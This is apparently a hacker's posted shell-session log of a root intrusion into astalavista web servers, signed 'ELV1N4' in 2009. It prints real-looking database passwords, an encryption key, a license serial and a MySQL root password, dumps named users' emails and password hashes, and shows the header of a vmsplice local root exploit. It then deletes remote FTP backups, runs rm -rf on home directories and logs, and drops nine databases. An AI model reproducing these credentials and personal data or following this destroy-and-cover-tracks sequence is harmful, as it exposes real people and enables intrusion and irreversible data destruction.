drwx------ 3 jon jon 4096 Sep 21 2007 jon
drwx------ 2 root root 16384 Sep 11 2007 lost+found
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
drwx------ 2 jon jon 4096 Sep 15 2007 test
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp

sh-3.2# cd admin
sh-3.2# ls -la
total 1735896
drwx--x--x 9 admin admin 4096 Nov 28 2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
drwx------ 2 admin admin 4096 Sep 28 2007 backups
-rw------- 1 admin admin 860 Sep 17 2008 .bash_history
-rw-r--r-- 1 admin admin 24 Sep 14 2007 .bash_logout
-rw-r--r-- 1 admin admin 176 Sep 14 2007 .bash_profile
-rw-r--r-- 1 admin admin 124 Sep 14 2007 .bashrc
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
drwx--x--x 6 admin admin 4096 Sep 21 2007 domains
drwxrwx--- 3 admin mail 4096 Sep 21 2007 imap
-rw-r--r-- 1 root root 24 Sep 21 2007 info.php
drwx------ 2 admin admin 4096 Sep 21 2007 mail
-rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
-rw-r--r-- 1 root root 887 Nov 28 2007 server.key
-rw-r----- 1 admin mail 34 Sep 14 2007 .shadow
-rw-r----- 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
drwx--x--x 2 admin admin 4096 Jul 29 2008 user_backups

sh-3.2# ..
sh-3.2# cd jon
sh-3.2# ls -la
total 36
drwx------ 3 jon jon 4096 Sep 21 2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
-rw------- 1 jon jon 53 Sep 21 2007 .bash_history
-rw-r--r-- 1 jon jon 24 Sep 21 2007 .bash_logout
-rw-r--r-- 1 jon jon 176 Sep 21 2007 .bash_profile
-rw-r--r-- 1 jon jon 124 Sep 21 2007 .bashrc
-rw-r--r-- 1 root root 24 Sep 21 2007 info.php
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html

sh-3.2# cd ..
sh-3.2# cd test
sh-3.2# ls -la
total 48
drwx------ 2 jon jon 4096 Sep 15 2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
-rw------- 1 jon jon 79 Sep 21 2007 .bash_history
-rw-r--r-- 1 jon jon 24 Sep 15 2007 .bash_logout
-rw-r--r-- 1 jon jon 176 Sep 15 2007 .bash_profile
-rw-r--r-- 1 jon jon 124 Sep 15 2007 .bashrc
sh-3.2# cat .bash_history
/usr/bin/mysqladmin -u root password PoliuJhytg67

sh-3.2# cd ..
sh-3.2# cd astanet
sh-3.2# ls -la
total 52
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
-rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
-rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
-rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
-rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
-rw------- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
-rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow

sh-3.2# cd auth/
sh-3.2# ls -la
total 28
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 ..
-rw-r--r-- 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
-rw-r--r-- 1 root root 319 Jan 5 2006 hosting.config.inc.php
-rw-r--r-- 1 root root 24 Jun 4 09:38 .htadm_pwd
-rw-r--r-- 1 root root 49 Jan 5 2006 .htpasswd_newhosting
-rw-r--r-- 1 root root 51 Oct 11 2006 .htwebalizer_pwd

sh-3.2# cat hackercontest.config.inc.php
// Variables for the database connection //
$conxHost = 'localhost'; // MySQL hostname
$conxUser = 'hackercontest'; // MySQL user
$conxPassword = 'K6m@7dUc'; // MySQL password
$bfkey = 'cXvB3981'; // Encryption/Decryption Key for Blowfish
?>
sh-3.2# cat hosting.config.inc.php
// Variables for the database connection //
$conxHost = 'localhost'; // MySQL hostname
$conxUser = 'hostinguser'; // MySQL user
$conxPassword = 'cXvB3981'; // MySQL password
$bfkey = 'cXvB3981'; // Encryption/Decryption Key for Blowfish
?>

sh-3.2# cd ..
sh-3.2# cd com
sh-3.2# ls -la
total 141208
drwx--x--x 10 com com 4096 Apr 28 12:40 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwx------ 2 com com 4096 Jun 4 04:04 backups
-rw-r--r-- 1 root root 2419504 Sep 28 2007 backup.sql
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
-rw------- 1 com com 21880 Jun 2 08:07 .bash_history
-rw-r--r-- 1 com com 24 Sep 24 2007 .bash_logout
-rw-r--r-- 1 com com 176 Sep 24 2007 .bash_profile
-rw-r--r-- 1 com com 124 Sep 24 2007 .bashrc
drwx--x--x 3 com com 4096 Jan 29 2008 domains
-rw-r--r-- 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
drwxrwx--- 3 com mail 4096 Jan 6 19:24 imap
-rw------- 1 com com 69 Nov 18 2008 .lesshst
drwx------ 2 com com 4096 Sep 24 2007 mail
-rw------- 1 com com 13970 Mar 28 21:42 .mysql_history
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
-rw-r----- 1 com mail 34 Sep 24 2007 .shadow
drwx------ 2 com com 4096 Aug 26 2008 .ssh
-rwx------ 1 com com 8515 Feb 10 2008 t
-rw-rw-r-- 1 com com 6265 Feb 11 2008 t.c
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
-rw-rw-r-- 1 com com 617 May 20 2008 .toprc
-rw-rw-r-- 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
-rw------- 1 com com 16629 Mar 28 21:46 .viminfo
-rw-rw-r-- 1 com com 51 Aug 25 2008 .vimrc

sh-3.2# head t.c
/*
* jessica_biel_naked_in_my_bed.c
*
* I roll in from the pub and see that Wojta again has nothing to do, damn.
* Kids, here you have something to play with until he blabs this one out too.
* Anyway it's old as hell and somehow broken as well.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*

sh-3.2# cd /
sh-3.2# ls -la
total 360
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
-rw------- 1 root root 10240 Jun 3 02:39 aquota.group
-rw------- 1 root root 10240 Jun 3 02:39 aquota.user
-rw-r----- 1 root root 819 Jul 17 2008 astalavista.us.db
-rw-r--r-- 1 root root 0 Jun 3 02:43 .autofsck
-rw-r--r-- 1 root root 0 Sep 16 2007 .autorelabel
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
-rw-r--r-- 1 root root 13387 Mar 20 2008 httpd.conf
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
drwx------ 2 root root 16384 Sep 11 2007 lost+found
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
-rw-r--r-- 1 root root 5859 Feb 3 2008 mrtg.cfg
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
drwxr-x--- 15 root root 4096 Jun 4 08:40 root
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var

sh-3.2# cd opt
sh-3.2# ls -la
total 20
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws

sh-3.2# cd lsws/
sh-3.2# ls -la
total 108
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
drwx------ 4 apache apache 4096 Jun 3 02:43 conf
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
-rw-r--r-- 1 root root 6959 May 29 15:10 LICENSE
-rw-r--r-- 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
-rw-r--r-- 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
-rw-r--r-- 1 root root 3208 May 29 15:10 LICENSE.PHP
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
drwx------ 2 apache apache 4096 Mar 20 2008 phpbuild
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
-rw-r--r-- 1 root root 6 May 29 15:10 VERSION

sh-3.2# cd conf
sh-3.2# ls -la
total 48
drwx------ 4 apache apache 4096 Jun 3 02:43 .
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
drwx------ 2 apache apache 4096 Mar 20 2008 cert
-rw-r--r-- 1 apache apache 6668 May 29 15:13 httpd_config.xml
-rw------- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
-rw-r--r-- 1 root apache 0 Jun 3 14:11 .last
-rw------- 1 apache apache 256 May 29 15:10 license.key
-rw------- 1 apache apache 256 Mar 21 2008 license.key.old
-rw------- 1 apache apache 3320 Mar 20 2008 mime.properties
-rw------- 1 apache apache 20 May 29 15:10 serial.no
drwx------ 2 apache apache 4096 Mar 20 2008 templates

sh-3.2# cat serial.no
IbDl-oVsO-CKqL-wVRa

sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 286844
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------------+
| Database |
+-----------------------+
| information_schema |
| astanet_ads |
| astanet_mailing_lists |
| astanet_mediawiki |
| astanet_membersystem |
| com_contrexx |
| com_contrexx2 |
| com_contrexx2_live |
| da_roundcube |
| dolphin |
| ideapool |
| mysql |
| test |
| yourmaster |
+-----------------------+
14 rows in set (0.00 sec)

mysql> use ideapool
Database changed
mysql> show tables;
+-----------------------------------+
| Tables_in_ideapool |
+-----------------------------------+
| eventum_columns_to_display |
| eventum_custom_field |
| eventum_custom_field_option |
| eventum_custom_filter |
| eventum_customer_account_manager |
| eventum_customer_note |
| eventum_email_account |
| eventum_email_draft |
| eventum_email_draft_recipient |
| eventum_email_response |
| eventum_faq |
| eventum_faq_support_level |
| eventum_group |
| eventum_history_type |
| eventum_irc_notice |
| eventum_issue |
| eventum_issue_association |
| eventum_issue_attachment |
| eventum_issue_attachment_file |
| eventum_issue_checkin |
| eventum_issue_custom_field |
| eventum_issue_history |
| eventum_issue_quarantine |
| eventum_issue_requirement |
| eventum_issue_user |
| eventum_issue_user_replier |
| eventum_link_filter |
| eventum_mail_queue |
| eventum_mail_queue_log |
| eventum_news |
| eventum_note |
| eventum_phone_support |
| eventum_project |
| eventum_project_category |
| eventum_project_custom_field |
| eventum_project_email_response |
| eventum_project_field_display |
| eventum_project_group |
| eventum_project_link_filter |
| eventum_project_news |
| eventum_project_phone_category |
| eventum_project_priority |
| eventum_project_release |
| eventum_project_round_robin |
| eventum_project_status |
| eventum_project_status_date |
| eventum_project_user |
| eventum_reminder_action |
| eventum_reminder_action_list |
| eventum_reminder_action_type |
| eventum_reminder_field |
| eventum_reminder_history |
| eventum_reminder_level |
| eventum_reminder_level_condition |
| eventum_reminder_operator |
| eventum_reminder_priority |
| eventum_reminder_requirement |
| eventum_reminder_triggered_action |
| eventum_resolution |
| eventum_round_robin_user |
| eventum_search_profile |
| eventum_status |
| eventum_subscription |
| eventum_subscription_type |
| eventum_support_email |
| eventum_support_email_body |
| eventum_time_tracking |
| eventum_time_tracking_category |
| eventum_user |
+-----------------------------------+
69 rows in set (0.00 sec)

mysql> describe eventum_user;
+-------------------------+------------------+------+-----+---------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-------------------------+------------------+------+-----+---------------------+----------------+
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
| usr_customer_id | int(11) unsigned | YES | | NULL | |
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
| usr_status | varchar(8) | NO | | active | |
| usr_password | varchar(32) | NO | | | |
| usr_full_name | varchar(255) | NO | | | |
| usr_email | varchar(255) | NO | UNI | | |
| usr_preferences | longtext | YES | | NULL | |
| usr_sms_email | varchar(255) | YES | | NULL | |
| usr_clocked_in | tinyint(1) | YES | | 0 | |
| usr_lang | varchar(5) | YES | | NULL | |
+-------------------------+------------------+------+-----+---------------------+----------------+
13 rows in set (0.00 sec)

mysql> select usr_full_name,usr_email,usr_password from eventum_user;
+----------------------+-------------------------------+----------------------------------+
| usr_full_name | usr_email | usr_password |
+----------------------+-------------------------------+----------------------------------+
| system | system-account@example.com | 14589714398751513457adf349173434 |
| Developer (Paulo) | paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
| Be1er0ph0r | be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
| Admin | pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
| ADMIN | admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
| USER | user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
| Glafkos - (nowayout) | glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
| Joao | joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
| Pascal | pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
| commander | commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
| ishtus | ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
| sykadul | sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
| Zach McElroy | admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
| usb | usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
| cyph3r | cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
+----------------------+-------------------------------+----------------------------------+
15 rows in set (0.00 sec)

mysql> exit
Bye


sh-3.2# ftp 212.254.194.163
Connected to 212.254.194.163.
220 BackupCOM_VW FTP server ready.
504 AUTH: security mechanism 'GSSAPI' not supported.
504 AUTH: security mechanism 'KERBEROS_V4' not supported.
KERBEROS_V4 rejected as an authentication type
Name (212.254.194.163:root): astalavista.com
331 Password required for astalavista.com.
Password:
230 User astalavista.com logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,188)
150 Opening BINARY mode data connection for 'file list'.
dr-x------ 1 root users 4096 Jun 4 06:13 astalavista.com
226 Transfer complete.
ftp> cd astalavista.com
250 CWD command successful.
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,189)
150 Opening BINARY mode data connection for 'file list'.
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
[snip]
226 Transfer complete.
ftp> mdelete *
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,193)
150 Opening BINARY mode data connection for 'file list'.
226 Transfer complete.
ftp>

sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
-rw------- 1 root root 8192 Jun 4 03:03 aquota.group
-rw------- 1 root root 8192 Jun 3 02:45 aquota.user
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
drwx--x--x 10 com com 4096 Apr 28 12:40 com
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
drwx------ 3 jon jon 4096 Sep 21 2007 jon
drwx------ 2 root root 16384 Sep 11 2007 lost+found
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
drwx------ 2 jon jon 4096 Sep 15 2007 test
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp

sh-3.2# rm -rf backup/
sh-3.2# rm -rf backup.14161/
sh-3.2# rm -rf ftp/
sh-3.2# rm -rf jon/
sh-3.2# rm -rf my/
sh-3.2# rm -rf mysqldata/
sh-3.2# rm -rf test/
sh-3.2# rm -rf tmp/
sh-3.2# cd ~
sh-3.2# rm -rf *
sh-3.2# rm -rf /var/log/
rm: cannot remove directory `/var/log//proftpd': Directory not empty
sh-3.2# rm -rf /home/*
sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 407156
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------------+
| Database |
+-----------------------+
| information_schema |
| astanet_ads |
| astanet_mailing_lists |
| astanet_mediawiki |
| astanet_membersystem |
| com_contrexx |
| com_contrexx2 |
| com_contrexx2_live |
| da_roundcube |
| dolphin |
| ideapool |
| mysql |
| test |
| yourmaster |
+-----------------------+
14 rows in set (0.03 sec)

mysql> drop database astanet_membersystem;
droQuery OK, 46 rows affected (0.81 sec)

mysql> drop database com_contrexx;
Query OK, 211 rows affected (2.72 sec)

mysql> drop database com_contrexx2;
Query OK, 237 rows affected (2.23 sec)

mysql> drop database com_contrexx2_live;
Query OK, 227 rows affected (7.63 sec)

mysql> drop database ideapool;
Query OK, 69 rows affected (0.19 sec)

mysql> drop database yourmaster;
Query OK, 158 rows affected (0.55 sec)

mysql> drop database astanet_ads;
Query OK, 9 rows affected (0.11 sec)

mysql> drop database astanet_mailing_lists;
Query OK, 24 rows affected (1.47 sec)

mysql> drop database astanet_mediawiki;
Query OK, 31 rows affected (0.51 sec)

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| da_roundcube |
| dolphin |
| mysql |
| test |
+--------------------+
5 rows in set (0.00 sec)

=============================================================


In this case it is proven that above the sky there is still another sky;
that is the only thing we need to remember.




REGARDS

ELV1N4


On 8/10/09 at 9:17 PM



elv1n4 Themes v2.0.0 © 2009 by elv1n4

www[dot]elv1n4.anti-sec[dot]org